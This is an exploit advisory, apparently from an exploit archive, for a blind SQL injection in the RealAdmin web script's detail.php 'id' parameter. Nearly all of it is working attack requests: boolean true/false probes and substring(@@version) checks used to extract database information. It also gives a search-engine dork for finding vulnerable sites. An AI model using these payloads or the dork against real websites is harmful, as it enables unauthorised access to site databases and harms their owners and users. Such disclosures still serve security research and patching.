id: 10760
date: 02/03/2010
title: RealAdmin (detail.php) Blind Sql Injection Vulnerability
author: AtT4CKxT3rR0r1ST
cves: 

========================================================
RealAdmin (detail.php) Blind Sql Injection Vulnerability
========================================================

.:. Script         : RealAdmin
.:. Download Script: http://www.redcow.ca/products/realadmin/
.:. Bug Type       : Blind Sql Injection
.:. Dork           : "Powered by RealAdmin and Red Cow Technologies, Inc."
 
####################################################################
 
===[ Exploit ]===
 
www.site.com/detail.php?id=[Blind SQL INJECTION]
 
 
www.site.com/detail.php?id=NULL+and+1=1       >>> True
www.site.com/detail.php?id=NULL+and+1=2       >>> False
 
 
www.site.com/detail.php?id=NULL+and+substring(@@version,1,1)=5  >>> True
www.site.com/detail.php?id=NULL+and+substring(@@version,1,1)=4  >>> False
 
 
####################################################################



#  0day.today [2023-03-27]  #